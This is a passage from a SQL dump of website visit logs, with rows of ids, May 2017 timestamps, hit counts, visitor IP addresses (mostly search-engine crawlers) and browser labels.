1,0,0,'217.182.132.151','other'),(108903,1494475280,1,1,0,0,'164.132.161.83','other'),(108904,1494475815,1,1,0,0,'51.255.65.60','other'),(108905,1494475913,1,1,0,0,'51.255.65.51','other'),(108906,1494476027,1,1,0,0,'137.74.207.120','other'),(108907,1494476210,1,1,0,0,'51.255.71.110','other'),(108908,1494477009,1,1,0,0,'217.182.132.147','other'),(108909,1494477125,1,1,0,0,'217.182.132.55','other'),(108910,1494477387,1,1,0,0,'91.196.178.66','firefox'),(108911,1494477420,1,1,0,0,'164.132.161.23','other'),(108912,1494477833,1,1,0,0,'164.132.161.96','other'),(108913,1494477897,1,1,0,0,'51.255.65.92','other'),(108914,1494478509,1,1,0,0,'164.132.161.97','other'),(108915,1494478530,1,1,0,0,'91.196.178.66','firefox'),(108916,1494478749,1,1,0,0,'66.102.9.27','chrome'),(108917,1494478895,1,1,0,0,'164.132.161.51','other'),(108918,1494478994,1,1,0,0,'180.76.15.32','other'),(108919,1494479222,1,1,0,0,'164.132.161.56','other'),(108920,1494479516,1,1,0,0,'51.255.65.54','other'),(108921,1494479534,1,1,0,0,'66.249.66.84','chrome'),(108922,1494479751,1,1,0,0,'217.182.132.64','other'),(108923,1494479964,1,1,0,0,'217.182.132.4','other'),(108924,1494479969,1,1,0,0,'51.255.65.27','other'),(108925,1494480177,1,1,0,0,'164.132.161.20','other'),(108926,1494480226,1,1,0,0,'207.46.13.102','other'),(108927,1494480586,1,1,0,0,'141.0.13.193','other'),(108928,1494480592,1,1,0,0,'51.255.65.64','other'),(108929,1494480685,1,1,0,0,'8.29.198.26','other'),(108930,1494481116,1,1,0,0,'91.196.178.68','chrome'),(108931,1494481430,1,1,0,0,'51.255.65.4','other'),(108932,1494481574,1,1,0,0,'217.182.132.156','other'),(108933,1494481696,1,1,0,0,'40.77.167.34','other'),(108934,1494481984,1,1,0,0,'91.196.177.46','chrome'),(108935,1494482274,1,1,0,0,'91.196.178.68','firefox'),(108936,1494482290,1,1,0,0,'164.132.161.57','other'),(108937,1494482407,1,1,0,0,'164.132.161.71','other'),(108938,1494482937,1,1,0,0,'137.74.207.164','other'),(108939,1494483011,1,1,0,0,'216.244.66.237','other'),(108940,1494483180,1,1,0,0,'109.63.134.69','msie'),(108941,1494483357,1,0,1,0,'66.249.76.108',''),(108942,1494483526,3,3,0,0,'95.158.189.118','other'),(108943,1494483532,1,1,0,0,'51.255.65.23','other'),(108944,1494483620,1,1,0,0,'217.182.132.29','other'),(108945,1494483633,1,0,1,0,'66.249.76.45',''),(108946,1494483664,1,1,0,0,'91.196.178.65','firefox'),(108947,1494483775,1,1,0,0,'217.182.132.51','other'),(108948,1494483953,1,1,0,0,'51.255.65.53','other'),(108949,1494484034,1,1,0,0,'51.255.65.14','other'),(108950,1494484251,1,1,0,0,'217.182.132.149','other'),(108951,1494484255,1,1,0,0,'91.124.238.128','chrome'),(108952,1494484398,1,1,0,0,'51.255.65.73','other'),(108953,1494484672,1,1,0,0,'217.182.132.86','other'),(108954,1494484745,1,1,0,0,'217.182.132.4','other'),(108955,1494485122,1,1,0,0,'185.26.180.197','other'),(108956,1494485265,1,1,0,0,'217.69.133.169','firefox'),(108957,1494485520,1,1,0,0,'77.222.134.100','firefox'),(108958,1494485717,1,1,0,0,'217.182.132.25','other'),(108959,1494485777,1,1,0,0,'66.249.66.84','chrome'),(108960,1494485821,1,1,0,0,'94.178.221.199','chrome'),(108961,1494485865,1,1,0,0,'157.55.39.90','other'),(108962,1494485905,1,1,0,0,'217.182.132.68','other'),(108963,1494485927,1,1,0,0,'66.249.66.180','chrome'),(108964,1494486108,1,1,0,0,'176.31.231.10','other'),(108965,1494486297,1,1,0,0,'51.255.71.133','other'),(108966,1494486375,1,1,0,0,'164.132.162.155','other'),(108967,1494486933,1,1,0,0,'141.0.12.228','other'),(108968,1494486967,1,1,0,0,'91.196.178.36','firefox'),(108969,1494487387,1,1,0,0,'37.52.20.243','firefox'),(108970,1494487405,1,1,0,0,'217.182.132.185','other'),(108971,1494487843,1,1,0,0,'51.255.71.126','other'),(108972,1494487985,1,1,0,0,'217.182.132.74','other'),(108973,1494488183,1,1,0,0,'91.196.177.26','chrome'),(108974,1494488553,1,0,1,0,'66.249.66.177',''),(108975,1494488850,1,1,0,0,'217.182.132.61','other'),(108976,1494489022,1,1,0,0,'164.132.161.54','other'),(108977,1494489115,1,1,0,0,'51.255.65.17','other'),(108978,1494489787,1,0,1,0,'66.249.76.45',''),(108979,1494489823,1,1,0,0,'217.182.132.184','other'),(108980,1494490358,1,1,0,0,'51.255.65.22','other'),(108981,1494490487,1,1,0,0,'91.196.178.71','firefox'),(108982,1494490654,1,1,0,0,'217.182.132.34','other'),(108983,1494490829,1,1,0,0,'91.196.178.68','chrome'),(108984,1494490882,1,1,0,0,'164.132.161.92','other'),(108985,1494490888,1,1,0,0,'217.182.132.184','other'),(108986,1494491180,1,0,1,0,'66.249.76.109',''),(108987,1494491512,1,1,0,0,'8.29.198.26','other'),(108988,1494491525,1,1,0,0,'217.182.132.70','other'),(108989,1494491752,1,1,0,0,'217.182.132.55','other'),(108990,1494492065,1,1,0,0,'92.113.13.22','chrome'),(108991,1494492568,1,1,0,0,'51.255.65.43','other'),(108992,1494492738,1,1,0,0,'51.255.65.50','other'),(108993,1494492820,1,1,0,0,'217.182.132.18','other'),(108994,1494492858,1,1,0,0,'217.182.132.32','other'),(108995,1494493032,1,1,0,0,'51.255.65.60','other'),(108996,1494493096,1,1,0,0,'92.113.188.158','chrome'),(108997,1494493136,1,1,0,0,'66.249.76.46','chrome'),(108998,1494493227,1,1,0,0,'185.26.180.135','other'),(108999,1494493566,1,1,0,0,'51.255.65.43','other'),(109000,1494494599,1,1,0,0,'46.201.227.188','chrome'),(109001,1494495298,1,1,0,0,'217.182.132.71','other'),(109002,1494495516,1,1,0,0,'91.196.178.68','chrome'),(109003,1494495530,1,1,0,0,'217.182.132.27','other'),(109004,1494495790,1,1,0,0,'51.255.65.6','other'),(109005,1494496057,1,1,0,0,'91.196.178.65','firefox'),(109006,1494496357,1,1,0,0,'141.8.142.154','other'),(109007,1494496360,1,1,0,0,'164.132.161.92','other'),(109008,1494496371,1,1,0,0,'178.154.200.37','other'),(109009,1494497328,1,1,0,0,'91.196.178.71','firefox'),(109010,1494497690,1,1,0,0,'94.45.145.8','firefox'),(109011,1494497755,1,0,1,0,'68.180.228.186',''),(109012,1494497990,1,1,0,0,'157.55.39.90','other'),(109013,1494498020,1,0,1,0,'66.249.66.180',''),(109014,1494498526,1,1,0,0,'91.196.178.65','firefox'),(109015,1494498536,1,1,0,0,'164.132.162.157','other'),(109016,1494499174,1,1,0,0,'162.210.196.100','other'),(109017,1494499179,1,1,0,0,'51.255.65.39','other'),(109018,1494499316,1,1,0,0,'51.255.65.50','other'),(109019,1494499430,1,0,1,0,'66.249.76.46',''),(109020,1494499515,1,1,0,0,'207.46.13.102','other'),(109021,1494499516,1,1,0,0,'51.255.65.58','other'),(109022,1494499715,1,1,0,0,'91.196.178.33','chrome'),(109023,1494500271,1,1,0,0,'137.74.207.164','other'),(109024,1494500357,1,1,0,0,'51.255.65.34','other'),(109025,1494500729,1,1,0,0,'164.132.161.96','other'),(109026,1494501122,1,1,0,0,'217.182.132.188','other'),(109027,1494501263,1,1,0,0,'51.255.71.128','other'),(109028,1494502037,1,1,0,0,'91.196.178.135','firefox'),(109029,1494502337,1,1,0,0,'8.29.198.26','other'),(109030,1494502407,1,1,0,0,'164.132.161.77','other'),(109031,1494502432,1,1,0,0,'46.200.40.46','msie'),(109032,1494502482,1,1,0,0,'164.132.161.38','other'),(109033,1494502781,1,1,0,0,'51.255.65.90','other'),(109034,1494502819,1,1,0,0,'78.111.190.212','firefox'),(109035,1494503379,1,1,0,0,'217.182.132.90','other'),(109036,1494503422,1,1,0,0,'66.249.66.183','chrome'),(109037,1494503581,1,1,0,0,'217.182.132.184','other'),(109038,1494504188,1,1,0,0,'51.255.65.86','other'),(109039,1494504228,1,1,0,0,'40.77.167.34','other'),(109040,1494504685,1,1,0,0,'46.175.22.142','chrome'),(109041,1494504695,1,1,0,0,'66.102.9.35','chrome'),(109042,1494504868,1,0,1,0,'66.249.76.46',''),(109043,1494505072,1,0,1,0,'66.249.76.107',''),(109044,1494505336,1,0,1,0,'66.249.66.183',''),(109045,1494505879,1,1,0,0,'91.196.178.66','firefox'),(109046,1494506138,1,1,0,0,'217.182.132.82','other'),(109047,1494506150,1,1,0,0,'164.132.161.27','other'),(109048,1494506729,1,1,0,0,'46.211.122.162','other'),(109049,1494507101,1,1,0,0,'164.132.161.9','other'),(109050,1494507503,1,1,0,0,'91.196.178.36','firefox'),(109051,1494507509,1,1,0,0,'91.196.178.132','other'),(109052,1494507562,1,0,1,0,'66.249.66.180',''),(109053,1494508150,2,2,0,0,'212.90.163.26','firefox'),(109054,1494508352,1,1,0,0,'217.182.132.241','other'),(109055,1494508679,1,1,0,0,'51.255.71.131','other'),(109056,1494509250,1,1,0,0,'95.135.90.26','firefox'),(109057,1494509904,1,1,0,0,'217.182.132.25','other'),(109058,1494510143,1,1,0,0,'217.182.132.4','other'),(109059,1494510329,1,1,0,0,'91.196.178.71','firefox'),(109060,1494510691,1,1,0,0,'217.182.132.24','other'),(109061,1494510930,1,1,0,0,'66.249.76.109','chrome'),(109062,1494511305,1,1,0,0,'164.132.161.92','other'),(109063,1494511424,1,1,0,0,'77.120.243.29','opera'),(109064,1494511563,1,1,0,0,'66.249.93.13','chrome'),(109065,1494511603,1,1,0,0,'217.182.132.182','other'),(109066,1494511921,1,1,0,0,'141.8.142.38','other'),(109067,1494512042,1,1,0,0,'51.255.71.125','other'),(109068,1494512203,1,1,0,0,'141.8.142.164','other'),(109069,1494512207,1,1,0,0,'95.108.213.7','other'),(109070,1494513165,1,1,0,0,'151.80.27.118','other'),(109072,1494513236,1,1,0,0,'217.182.132.23','other'),(109073,1494513237,1,1,0,0,'91.196.178.33','chrome'),(109074,1494513278,1,0,1,0,'68.180.228.186',''),(109075,1494513452,1,1,0,0,'164.132.161.66','other'),(109076,1494513548,1,1,0,0,'51.255.65.83','other'),(109077,1494513597,1,1,0,0,'65.19.138.34','other'),(109078,1494513877,1,1,0,0,'137.74.207.188','other'),(109079,1494514009,1,1,0,0,'217.182.132.56','other'),(109080,1494514107,1,1,0,0,'217.182.132.18','other'),(109081,1494514409,1,1,0,0,'217.182.132.241','other'),(109082,1494514532,1,1,0,0,'164.132.161.12','other'),(109083,1494515199,1,1,0,0,'188.255.21.154','msie'),(109084,1494515252,1,1,0,0,'164.132.161.87','other'),(109085,1494515263,1,1,0,0,'37.54.19.165','firefox'),(109086,1494515448,1,0,1,0,'66.249.76.107',''),(109087,1494515861,1,1,0,0,'217.182.132.152','other'),(109088,1494515894,1,0,1,0,'68.180.228.186',''),(109089,1494516307,1,1,0,0,'164.132.161.74','other'),(109090,1494516375,1,1,0,0,'217.182.132.25','other'),(109091,1494516672,1,1,0,0,'164.132.161.22','other'),(109092,1494517428,1,1,0,0,'164.132.161.78','other'),(109093,1494517466,1,1,0,0,'51.255.65.54','other'),(109094,1494517580,1,1,0,0,'207.46.13.102','other'),(109095,1494517826,1,1,0,0,'216.244.66.237','other'),(109096,1494517958,1,1,0,0,'164.132.161.7','other'),(109097,1494518110,1,1,0,0,'164.132.161.83','other'),(109098,1494518501,1,1,0,0,'164.132.161.11','other'),(109099,1494518517,1,1,0,0,'51.255.65.74','other'),(109100,1494518548,1,1,0,0,'185.30.202.80','chrome'),(109101,1494518663,1,1,0,0,'51.255.71.122','other'),(109102,1494518686,1,1,0,0,'164.132.161.12','other'),(109103,1494519238,1,1,0,0,'217.182.132.157','other'),(109104,1494519474,1,1,0,0,'51.255.71.98','other'),(109105,1494519647,1,1,0,0,'66.249.76.47','chrome'),(109106,1494519870,1,1,0,0,'51.255.65.65','other'),(109107,1494520204,1,1,0,0,'51.255.65.34','other'),(109108,1494520502,1,1,0,0,'217.182.132.36','other'),(109109,1494521881,1,1,0,0,'164.132.162.154','other'),(109110,1494521945,1,1,0,0,'51.255.65.85','other'),(109111,1494522034,1,1,0,0,'164.132.161.30','other'),(109112,1494522043,1,1,0,0,'51.255.65.49','other'),(109113,1494522051,1,1,0,0,'217.182.132.175','other'),(109114,1494522159,1,1,0,0,'51.255.65.44','other'),(109115,1494522314,1,1,0,0,'51.255.65.67','other'),(109116,1494522825,1,1,0,0,'217.182.132.193','other'),(109117,1494523000,1,1,0,0,'217.182.132.23','other'),(109118,1494523322,1,1,0,0,'51.255.65.19','other'),(109119,1494523530,1,1,0,0,'164.132.161.8','other'),(109120,1494523708,1,1,0,0,'164.132.161.10','other'),(109121,1494523910,1,1,0,0,'141.8.142.154','other'),(109122,1494523945,1,1,0,0,'5.255.253.63','other'),(109123,1494524004,1,1,0,0,'164.132.164.180','other'),(109124,1494524420,1,1,0,0,'217.182.132.149','other'),(109125,1494524425,1,1,0,0,'8.29.198.25','other'),(109126,1494524539,1,1,0,0,'217.182.132.188','other'),(109127,1494524897,1,1,0,0,'217.182.132.18','other'),(109128,1494525507,1,1,0,0,'51.255.65.12','other'),(109129,1494525667,1,1,0,0,'51.255.71.131','other'),(109130,1494525759,4,4,0,0,'95.108.179.15','other'),(109131,1494525763,4,4,0,0,'141.8.142.15','other'),(109132,1494525773,2,2,0,0,'5.255.253.63','other'),(109133,1494525776,1,1,0,0,'5.255.253.81','other'),(109134,1494525784,3,3,0,0,'141.8.142.38','other'),(109135,1494525788,4,4,0,0,'95.108.213.34','other'),(109136,1494525791,4,4,0,0,'141.8.142.164','other'),(109137,1494525803,2,2,0,0,'5.255.253.58','other'),(109138,1494525817,1,1,0,0,'141.8.142.154','other'),(109139,1494525850,3,3,0,0,'95.108.213.7','other'),(109140,1494525942,1,1,0,0,'164.132.161.83','other'),(109141,1494526444,1,1,0,0,'180.76.15.145','other'),(109142,1494526494,1,1,0,0,'51.255.65.21','other'),(109143,1494526593,1,1,0,0,'164.132.161.2','other'),(109144,1494527272,2,0,2,0,'66.249.76.107',''),(109145,1494527459,1,1,0,0,'164.132.161.31','other'),(109146,1494527905,1,1,0,0,'51.255.71.101','other'),(109147,1494528188,1,1,0,0,'216.244.66.237','other'),(109148,1494528807,1,1,0,0,'141.8.142.38','other'),(109149,1494528812,1,1,0,0,'178.154.200.37','other'),(109150,1494528838,1,1,0,0,'164.132.162.188','other'),(109151,1494528937,1,1,0,0,'46.165.197.141','other'),(109152,1494529451,1,1,0,0,'157.55.39.90','other'),(109153,1494529513,1,1,0,0,'51.255.65.27','other'),(109155,1494529535,1,1,0,0,'91.196.178.166','chrome'),(109156,1494529844,1,1,0,0,'92.112.231.201','chrome'),(109157,1494530118,1,1,0,0,'91.231.8.2','chrome'),(109158,1494530122,2,0,2,0,'68.180.228.186',''),(109159,1494530224,1,1,0,0,'164.132.161.16','other'),(109160,1494530417,1,1,0,0,'51.255.65.89','other'),(109161,1494531301,1,1,0,0,'51.255.71.113','other'),(109162,1494531581,1,1,0,0,'141.8.142.164','other'),(109163,1494531815,1,0,1,0,'66.249.76.47',''),(109164,1494532047,1,1,0,0,'51.255.71.115','other'),(109165,1494532070,1,1,0,0,'137.74.201.108','other'),(109166,1494532245,1,1,0,0,'217.182.132.55','other'),(109167,1494532624,1,0,1,0,'68.180.228.186',''),(109168,1494532881,1,1,0,0,'207.46.13.102','other'),(109169,1494533632,1,1,0,0,'51.255.65.63','other'),(109170,1494533697,1,1,0,0,'217.182.132.21','other'),(109171,1494533815,2,0,2,0,'66.249.66.84',''),(109172,1494534068,1,1,0,0,'164.132.161.96','other'),(109173,1494534281,1,1,0,0,'51.255.65.96','other'),(109174,1494534323,1,1,0,0,'217.182.132.77','other'),(109175,1494534348,1,1,0,0,'51.255.71.126','other'),(109176,1494535072,1,0,1,0,'66.249.66.183',''),(109177,1494535178,2,0,2,0,'66.249.66.81',''),(109178,1494535247,1,1,0,0,'8.29.198.25','other'),(109179,1494535260,1,1,0,0,'164.132.161.6','other'),(109180,1494535672,1,1,0,0,'164.132.161.45','other'),(109181,1494535898,1,1,0,0,'164.132.161.85','other'),(109182,1494535909,1,1,0,0,'213.92.191.77','chrome'),(109183,1494536117,1,1,0,0,'51.255.71.132','other'),(109184,1494536374,1,1,0,0,'164.132.161.64','other'),(109185,1494536889,1,1,0,0,'137.74.207.170','other'),(109186,1494536976,1,1,0,0,'164.132.161.13','other'),(109187,1494537404,1,1,0,0,'51.255.65.59','other'),(109188,1494537847,1,1,0,0,'217.182.132.152','other'),(109189,1494538092,1,1,0,0,'51.255.65.7','other'),(109190,1494538210,1,0,1,0,'66.249.66.177',''),(109191,1494538310,1,0,1,0,'66.249.66.183',''),(109192,1494538850,1,1,0,0,'164.132.161.73','other'),(109193,1494539208,1,1,0,0,'178.154.200.37','other'),(109194,1494539259,1,1,0,0,'51.255.71.116','other'),(109195,1494539439,1,0,1,0,'66.249.66.177',''),(109196,1494539447,1,0,1,0,'66.249.66.84',''),(109197,1494539601,1,0,1,0,'68.180.231.24',''),(109198,1494539603,1,1,0,0,'180.76.15.34','other'),(109199,1494539765,1,1,0,0,'164.132.161.58','other'),(109200,1494540133,1,1,0,0,'164.132.161.11','other'),(109201,1494540697,1,1,0,0,'217.182.132.153','other'),(109202,1494540803,1,1,0,0,'51.255.65.92','other'),(109203,1494540936,1,1,0,0,'217.182.132.4','other'),(109204,1494541239,1,1,0,0,'176.31.231.10','other'),(109205,1494541626,1,1,0,0,'207.46.13.102','other'),(109206,1494542361,1,1,0,0,'5.255.253.63','other'),(109207,1494542471,1,1,0,0,'51.255.65.68','other'),(109208,1494542822,1,1,0,0,'217.182.132.18','other'),(109209,1494542900,1,0,1,0,'66.249.66.81',''),(109210,1494543090,1,1,0,0,'217.182.132.61','other'),(109211,1494543373,1,1,0,0,'217.182.132.182','other'),(109212,1494543600,1,1,0,0,'176.31.231.10','other'),(109213,1494543710,1,1,0,0,'51.255.65.6','other'),(109214,1494544111,1,1,0,0,'51.255.65.64','other'),(109215,1494544137,1,1,0,0,'217.182.132.80','other'),(109216,1494544184,1,1,0,0,'51.255.65.38','other'),(109217,1494544927,1,0,1,0,'66.249.66.81',''),(109218,1494545233,1,1,0,0,'51.255.65.56','other'),(109219,1494545599,1,1,0,0,'217.182.132.97','other'),(109220,1494545802,1,1,0,0,'217.182.132.77','other'),(109221,1494546097,1,1,0,0,'8.29.198.26','other'),(109222,1494546119,1,1,0,0,'154.16.53.117','other'),(109223,1494546275,1,1,0,0,'164.132.161.8','other'),(109224,1494546540,1,1,0,0,'51.255.65.50','other'),(109225,1494547046,1,1,0,0,'164.132.161.35','other'),(109226,1494547429,1,1,0,0,'164.132.162.164','other'),(109227,1494547548,1,1,0,0,'51.255.71.126','other'),(109228,1494547929,1,1,0,0,'217.182.132.25','other'),(109229,1494548182,1,1,0,0,'207.46.13.93','other'),(109230,1494548410,1,0,1,0,'66.249.66.171',''),(109231,1494548899,1,1,0,0,'164.132.161.74','other'),(109232,1494549186,1,1,0,0,'164.132.161.26','other'),(109233,1494549572,1,1,0,0,'51.255.71.115','other'),(109234,1494549628,1,1,0,0,'164.132.161.65','other'),(109235,1494549666,1,1,0,0,'51.255.71.132','other'),(109236,1494549734,1,1,0,0,'40.77.167.34','other'),(109237,1494550965,1,1,0,0,'217.182.132.155','other'),(109238,1494551311,1,0,1,0,'66.249.66.180',''),(109239,1494551364,2,0,2,0,'66.249.66.84',''),(109240,1494551701,1,1,0,0,'217.182.132.29','other'),(109241,1494552737,1,1,0,0,'217.182.132.90','other'),(109242,1494552792,1,1,0,0,'217.182.132.62','other'),(109243,1494552901,1,1,0,0,'51.255.65.91','other'),(109244,1494552933,1,1,0,0,'217.182.132.19','other'),(109245,1494553036,1,1,0,0,'95.24.25.5','msie'),(109246,1494553180,1,1,0,0,'176.195.109.80','msie'),(109247,1494553201,1,1,0,0,'180.76.15.33','other'),(109248,1494553527,1,1,0,0,'164.132.161.71','other'),(109249,1494553878,1,1,0,0,'217.182.132.15','other'),(109250,1494554290,1,0,1,0,'68.180.228.186',''),(109251,1494554394,1,1,0,0,'217.182.132.34','other'),(109252,1494554735,1,1,0,0,'164.132.161.5','other'),(109253,1494554878,1,1,0,0,'207.46.13.102','other'),(109254,1494554917,1,1,0,0,'217.182.132.173','other'),(109255,1494554970,1,1,0,0,'51.255.65.91','other'),(109256,1494555535,1,1,0,0,'137.74.201.100','other'),(109257,1494555760,1,0,1,0,'68.180.231.24',''),(109258,1494555898,1,1,0,0,'164.132.161.16','other'),(109259,1494555922,1,1,0,0,'164.132.162.188','other'),(109260,1494556002,1,1,0,0,'207.46.13.102','other'),(109261,1494556229,1,1,0,0,'51.255.71.116','other'),(109262,1494556600,1,1,0,0,'51.255.65.45','other'),(109263,1494556801,1,1,0,0,'217.182.132.94','other'),(109264,1494556827,2,0,2,0,'68.180.228.186',''),(109265,1494556957,1,1,0,0,'8.29.198.26','other'),(109266,1494557029,1,1,0,0,'217.182.132.24','other'),(109267,1494557274,2,0,2,0,'66.249.66.81',''),(109268,1494557285,1,0,1,0,'66.249.66.87',''),(109269,1494557786,1,1,0,0,'51.255.71.114','other'),(109270,1494557876,3,0,3,0,'66.249.66.177',''),(109271,1494558131,1,1,0,0,'51.255.65.91','other'),(109272,1494558947,1,1,0,0,'51.255.65.89','other'),(109273,1494559441,1,1,0,0,'164.132.161.6','other'),(109274,1494559443,1,1,0,0,'164.132.161.60','other'),(109275,1494559585,1,0,1,0,'68.180.231.24',''),(109276,1494560366,1,1,0,0,'217.182.132.33','other'),(109277,1494560375,1,1,0,0,'217.182.132.18','other'),(109278,1494560460,1,1,0,0,'164.132.161.71','other'),(109279,1494560537,1,1,0,0,'51.255.65.92','other'),(109280,1494560986,1,1,0,0,'217.182.132.151','other'),(109281,1494561051,1,1,0,0,'51.255.65.40','other'),(109282,1494561206,1,1,0,0,'51.255.65.49','other'),(109283,1494561274,1,0,1,0,'66.249.66.87',''),(109284,1494561395,1,0,1,0,'66.249.66.81',''),(109285,1494561401,1,1,0,0,'217.182.132.32','other'),(109286,1494561493,1,1,0,0,'164.132.161.46','other'),(109287,1494561695,1,1,0,0,'217.182.132.59','other'),(109288,1494562423,1,0,1,0,'66.249.66.84',''),(109289,1494562428,1,0,1,0,'68.180.228.186',''),(109290,1494563519,1,0,1,0,'66.249.66.87',''),(109291,1494564029,1,1,0,0,'91.196.178.67','firefox'),(109292,1494564037,1,1,0,0,'91.196.178.99','chrome'),(109293,1494564546,1,1,0,0,'66.249.66.180','chrome'),(109294,1494565135,1,1,0,0,'91.196.178.97','chrome'),(109295,1494565755,1,1,0,0,'164.132.161.45','other'),(109296,1494566043,1,1,0,0,'51.255.65.12','other'),(109297,1494566391,1,1,0,0,'91.196.178.100','firefox'),(109298,1494566516,1,1,0,0,'51.255.65.27','other'),(109299,1494566634,1,1,0,0,'92.113.27.113','opera'),(109300,1494566647,1,1,0,0,'66.249.66.81','chrome'),(109301,1494567104,1,1,0,0,'217.182.132.94','other'),(109302,1494567239,1,0,1,0,'68.180.228.186',''),(109303,1494567803,1,1,0,0,'8.29.198.26','other'),(109304,1494567813,1,1,0,0,'91.196.178.168','chrome'),(109305,1494568121,1,1,0,0,'91.196.178.39','chrome'),(109306,1494568307,1,1,0,0,'51.255.65.60','other'),(109307,1494568351,1,1,0,0,'144.76.19.144','other'),(109308,1494568381,2,0,2,0,'66.249.66.81',''),(109309,1494568472,1,1,0,0,'164.132.162.164','other'),(109310,1494568552,1,1,0,0,'51.255.65.6','other'),(109311,1494568852,1,1,0,0,'164.132.161.43','other'),(109312,1494569296,1,1,0,0,'51.255.65.4','other'),(109313,1494569372,1,1,0,0,'178.54.80.4','other'),(109314,1494569667,1,1,0,0,'164.132.161.11','other'),(109315,1494570335,1,1,0,0,'91.196.178.71','chrome'),(109316,1494570389,1,1,0,0,'217.69.133.230','other'),(109317,1494570547,1,1,0,0,'164.132.161.63','other'),(109318,1494570604,1,1,0,0,'37.52.20.137','firefox'),(109319,1494570782,1,1,0,0,'91.196.178.68','chrome'),(109320,1494571234,1,1,0,0,'164.132.161.72','other'),(109321,1494571528,1,1,0,0,'193.19.152.14','firefox'),(109322,1494571729,1,1,0,0,'217.182.132.6','other'),(109323,1494571916,1,0,1,0,'66.249.66.177',''),(109324,1494571929,1,0,1,0,'66.249.66.81',''),(109325,1494572269,1,1,0,0,'51.255.65.51','other'),(109326,1494572912,1,1,0,0,'95.135.241.143','chrome'),(109327,1494573517,1,1,0,0,'141.8.142.15','other'),(109328,1494573653,1,1,0,0,'164.132.161.90','other'),(109329,1494573702,1,1,0,0,'217.182.132.68','other'),(109330,1494573989,1,1,0,0,'51.255.65.69','other'),(109331,1494574062,1,1,0,0,'66.249.66.81','chrome'),(109332,1494574124,1,1,0,0,'217.182.132.75','other'),(109333,1494574190,1,1,0,0,'51.255.65.65','other'),(109334,1494574444,1,1,0,0,'66.249.93.13','chrome'),(109335,1494574694,1,1,0,0,'51.255.65.24','other'),(109336,1494574706,1,0,1,0,'66.249.66.84',''),(109337,1494574786,1,1,0,0,'217.69.136.204','other'),(109338,1494575274,1,1,0,0,'95.135.241.143','chrome'),(109339,1494575415,1,1,0,0,'91.196.178.69','chrome'),(109340,1494575485,1,1,0,0,'5.255.253.58','other'),(109341,1494575486,1,1,0,0,'5.255.253.81','other'),(109342,1494575665,1,0,1,0,'68.180.228.186',''),(109343,1494576084,1,1,0,0,'164.132.161.7','other'),(109344,1494576325,1,1,0,0,'46.201.227.188','chrome'),(109345,1494576406,1,1,0,0,'51.255.65.68','other'),(109346,1494576417,1,1,0,0,'66.249.66.180','chrome'),(109347,1494577097,1,0,1,0,'66.249.66.177',''),(109348,1494577284,1,1,0,0,'51.255.71.111','other'),(109349,1494577401,1,1,0,0,'46.133.175.44','firefox'),(109350,1494577622,2,2,0,0,'162.210.196.97','other'),(109351,1494577709,1,0,1,0,'66.249.66.180',''),(109352,1494577728,2,0,2,0,'66.249.66.81',''),(109353,1494577765,1,1,0,0,'77.52.195.142','chrome'),(109354,1494577833,1,0,1,0,'66.249.66.183',''),(109355,1494577980,1,1,0,0,'164.132.161.28','other'),(109356,1494578120,1,1,0,0,'217.182.132.147','other'),(109357,1494578209,1,1,0,0,'157.55.39.90','other'),(109358,1494578286,1,1,0,0,'51.255.65.82','other'),(109359,1494578474,1,0,1,0,'66.249.66.87',''),(109360,1494578475,1,1,0,0,'46.201.227.188','chrome'),(109361,1494578610,1,1,0,0,'217.182.132.241','other'),(109362,1494578638,1,1,0,0,'8.29.198.25','other'),(109363,1494578639,1,1,0,0,'193.19.152.14','firefox'),(109364,1494578761,1,1,0,0,'51.255.65.79','other'),(109365,1494578805,2,2,0,0,'82.207.91.234','firefox'),(109366,1494578921,1,1,0,0,'137.74.207.109','other'),(109367,1494579001,1,1,0,0,'217.182.132.51','other'),(109368,1494579284,1,0,1,0,'66.249.66.84',''),(109369,1494579323,1,1,0,0,'164.132.161.82','other'),(109370,1494579361,1,1,0,0,'77.52.195.142','chrome'),(109371,1494580247,1,1,0,0,'51.255.65.59','other'),(109372,1494580382,1,1,0,0,'217.182.132.87','other'),(109373,1494580416,1,1,0,0,'217.182.132.36','other'),(109374,1494580683,1,0,1,0,'68.180.228.186',''),(109375,1494580778,1,1,0,0,'137.74.201.99','other'),(109376,1494580796,1,0,1,0,'66.249.66.177',''),(109377,1494581605,1,1,0,0,'164.132.161.27','other'),(109378,1494581624,1,1,0,0,'157.55.39.90','other'),(109379,1494581827,1,1,0,0,'217.182.132.171','other'),(109380,1494582052,1,1,0,0,'78.111.185.239','firefox'),(109381,1494582154,1,1,0,0,'89.21.72.182','firefox'),(109382,1494582328,2,0,2,0,'66.249.66.183',''),(109383,1494582456,1,1,0,0,'91.196.178.135','firefox'),(109384,1494582602,1,1,0,0,'164.132.161.29','other'),(109385,1494583039,1,1,0,0,'217.182.132.75','other'),(109386,1494583185,1,1,0,0,'164.132.161.4','other'),(109387,1494583397,1,1,0,0,'91.196.178.68','firefox'),(109388,1494583490,1,1,0,0,'91.196.178.68','chrome'),(109389,1494583755,1,1,0,0,'164.132.161.10','other'),(109390,1494583956,1,1,0,0,'51.255.71.126','other'),(109391,1494584378,1,1,0,0,'51.255.65.56','other'),(109392,1494584474,1,1,0,0,'217.182.132.91','other'),(109393,1494584599,1,1,0,0,'164.132.161.83','other'),(109394,1494584805,1,0,1,0,'66.249.66.177',''),(109395,1494584811,1,0,1,0,'66.249.66.81',''),(109396,1494585250,1,0,1,0,'66.249.66.84',''),(109397,1494585378,1,1,0,0,'217.182.132.170','other'),(109398,1494585449,1,1,0,0,'217.182.132.147','other'),(109399,1494585525,1,1,0,0,'91.196.178.133','chrome'),(109400,1494585664,1,0,1,0,'66.249.66.183',''),(109401,1494585775,1,1,0,0,'51.255.65.19','other'),(109402,1494585784,1,0,1,0,'66.249.66.180',''),(109403,1494585853,1,1,0,0,'51.255.65.22','other'),(109404,1494586626,1,0,1,0,'66.249.66.87',''),(109405,1494586745,1,1,0,0,'217.182.132.29','other'),(109406,1494586776,1,1,0,0,'66.249.66.180','chrome'),(109407,1494586817,1,1,0,0,'164.132.161.90','other'),(109408,1494586980,1,0,1,0,'66.249.66.183',''),(109409,1494587460,2,2,0,0,'92.112.249.216','chrome'),(109410,1494587579,1,1,0,0,'164.132.161.49','other'),(109411,1494587606,1,1,0,0,'51.255.64.106','other'),(109412,1494588025,1,1,0,0,'51.255.71.110','other'),(109413,1494588814,1,1,0,0,'137.74.207.170','other'),(109414,1494588834,1,1,0,0,'51.255.65.92','other'),(109415,1494589083,1,1,0,0,'37.53.150.94','chrome'),(109416,1494589413,1,1,0,0,'66.249.66.183','chrome'),(109417,1494589473,1,0,1,0,'66.249.66.18